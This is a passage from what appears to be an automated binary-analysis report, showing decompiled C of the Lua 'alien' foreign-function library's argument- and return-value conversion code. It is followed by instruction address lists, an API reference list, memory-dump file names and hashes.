							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a223ed
0x00a223ed
0x00a223ed
0x00a223ed
0x00a223ed
0x00a223ed
0x00a223ef
0x00a223f4
0x00a223ff
0x00a22406
0x00a2240b
0x00a22411
0x00a22413
0x00a22418
0x00a2241b
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a22074
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22236
0x00a22237
0x00a2223c
0x00a2223f
0x00a22242
0x00a22244
0x00a22247
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_tonumber.LUA5.1 ref: 00A223EF
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_pushnumber.LUA5.1(?,?,?), ref: 00A22561
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?), ref: 00A2258A
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?), ref: 00A225B3
lua_pushnumber.LUA5.1(?,?,?,?,?), ref: 00A225E3
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 00A22619
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22666
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22696
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226BF
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A226E8
lua_pushstring.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22713
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2271E
lua_pushlightuserdata.LUA5.1(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22749
luaL_error.LUA5.1(?,alien: unknown return type (function %s),?), ref: 00A22766
lua_pushnumber.LUA5.1(?), ref: 00A227CE
lua_pushnumber.LUA5.1(?), ref: 00A227F4
lua_pushnumber.LUA5.1(?), ref: 00A2280B
lua_pushnumber.LUA5.1(?), ref: 00A2282B

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnumber.$lua_pushnil.$L_error.lua_pushlightuserdata.lua_pushstring.lua_tonumber.
String ID:
API String ID: 2475247279-0
Opcode ID: 3cf6e3a693f75c06233a7d9def4a2f46c91337822d9117dff1d2a9bdb203ef3d
Instruction ID: 5366007f8dad4bdee1b0edf05d3ee4f23d15aa10bcfcd34972a9813acf86fb93
Opcode Fuzzy Hash: 3cf6e3a693f75c06233a7d9def4a2f46c91337822d9117dff1d2a9bdb203ef3d
Instruction Fuzzy Hash: 1CB193B5D04129ABCB04EB98FE81DEEBBF8FF49300F144528E441B7246D6399A15CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00A2246F, Relevance: 25.8, APIs: 17, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00A2246F(void* __edi, long long __fp0) {
				long long* __ebx;
				void* __esi;
				void* _t219;
				intOrPtr* _t223;
				signed int _t225;
				char* _t226;
				signed int _t227;
				char* _t228;
				signed int _t239;
				void* _t246;
				void* _t248;
				intOrPtr _t250;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;
				signed int _t277;
				void* _t279;
				intOrPtr* _t280;
				void* _t281;
				long long _t291;

				L0:
				while(1) {
					L0:
					_t291 = __fp0;
					_t272 = __edi;
					_push(_t246);
					L00A23F68();
					_t280 = _t279 + 8;
					 *((char*)( *((intOrPtr*)(_t277 - 0x2c)))) = E00A245C0(_t219, __fp0);
					E00A246A0(4);
					_t250 =  *((intOrPtr*)(_t277 - 0x2c));
					_t223 = _t280;
					 *_t223 = _t250;
					 *((intOrPtr*)( *((intOrPtr*)(_t277 - 0xc)) + __edi)) = _t223;
					 *((intOrPtr*)(_t277 - 0x2c)) = _t250 + 1;
					while(1) {
						L36:
						 *((intOrPtr*)(_t277 - 0xc)) =  *((intOrPtr*)(_t277 - 0xc)) + 4;
						_t246 = _t246 + 1;
						_t116 = _t277 - 0x4c;
						 *_t116 =  *((intOrPtr*)(_t277 - 0x4c)) - 1;
						if( *_t116 == 0) {
							break;
						}
						L1:
						_t252 =  *((intOrPtr*)(_t277 - 0x14));
						_t263 =  *((intOrPtr*)(_t252 + 0x30));
						_t225 =  *( *((intOrPtr*)(_t277 - 0xc)) +  *((intOrPtr*)(_t252 + 0x30)));
						if(_t225 > 0x11) {
							L33:
							_t226 =  *(_t252 + 8);
							if(_t226 == 0) {
								_t226 = "anonymous";
							}
							_push(_t226);
							_push(_t246);
							_push("alien: parameter %i is of unknown type (function %s)");
							_push(_t275);
							L00A23F26();
							_t280 = _t280 + 0x10;
							continue;
						}
						L2:
						switch( *((intOrPtr*)(_t225 * 4 +  &M00A2287C))) {
							case 0:
								L3:
								_t244 = E00A246A0(4);
								 *((intOrPtr*)(_t277 - 8)) = _t280;
								_push(_t246);
								_push(_t275);
								L00A23F68();
								_t280 = _t280 + 8;
								_t245 = E00A245C0(_t244, _t291);
								_t262 =  *((intOrPtr*)(_t277 - 8));
								_t263 =  *((intOrPtr*)(_t277 - 0xc));
								 *_t262 = _t245;
								 *((intOrPtr*)( *((intOrPtr*)(_t277 - 0xc)) + _t272)) = _t262;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								L11:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__ecx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__ecx + __edi) = __eax;
								goto L36;
							case 8:
								L12:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								L10:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								L13:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								L25:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								goto L0;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 8;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								L20:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t253 =  *((intOrPtr*)(_t277 - 0x14));
					 *((intOrPtr*)(_t277 - 0x3c)) = 0;
					_t227 =  *(_t253 + 0xc);
					if(_t227 > 0xc) {
						L58:
						_t228 =  *(_t253 + 8);
						if(_t228 == 0) {
							_t228 = "anonymous";
						}
						_push(_t228);
						_push("alien: unknown return type (function %s)");
						_push(_t275);
						L00A23F26();
						L61:
						_t281 = _t280 + 0xc;
						L62:
						 *((intOrPtr*)(_t277 - 0x24)) =  *((intOrPtr*)(_t277 - 0x24)) +  ~( *(_t277 - 0x48)) * 4;
						 *((intOrPtr*)(_t277 - 0x2c)) =  *((intOrPtr*)(_t277 - 0x2c)) -  *((intOrPtr*)(_t277 - 0x30));
						_t273 = 0;
						 *((intOrPtr*)(_t277 - 0x28)) =  *((intOrPtr*)(_t277 - 0x28)) +  ~( *(_t277 - 0x38)) * 4;
						if( *((intOrPtr*)(_t277 - 0x44)) <= 0) {
							L72:
							_pop(_t274);
							_pop(_t276);
							_pop(_t248);
							return E00A245A4( *((intOrPtr*)(_t277 - 0x30)) +  *((intOrPtr*)(_t277 - 0x34)) +  *(_t277 - 0x38) +  *(_t277 - 0x48) + 1, _t248,  *(_t277 - 4) ^ _t277,  *(_t277 - 0x48), _t274, _t276);
						} else {
							goto L63;
						}
						do {
							L63:
							_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t277 - 0x14)) + 0x30)) + _t273 * 4)) + 0xfffffff3;
							if(_t239 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t239 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t284 = _t281 - 8;
									 *_t284 = _t291;
									_push(_t275);
									L00A23F80();
									_t281 = _t284 + 0xc;
									 *((intOrPtr*)(_t277 - 0x24)) =  *((intOrPtr*)(_t277 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
